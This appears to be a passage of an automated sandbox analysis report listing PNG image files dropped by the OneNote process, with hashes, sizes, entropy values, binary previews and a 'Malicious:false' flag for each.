                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
